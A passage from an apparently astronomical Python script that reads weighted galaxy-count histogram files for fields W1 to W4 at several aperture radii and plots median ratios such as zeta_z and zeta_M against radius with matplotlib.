np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = 
np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = 
q_read[q_read < 10]\n\nplt.subplot(453)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(453)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{z}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\n\ncols=7\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' 
% (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = 
np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(454)\nrangemax=3\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(454)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, 
color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\n\ncols=9\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = 
np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(456)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], 
[np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(456)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\n\ncols=11\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 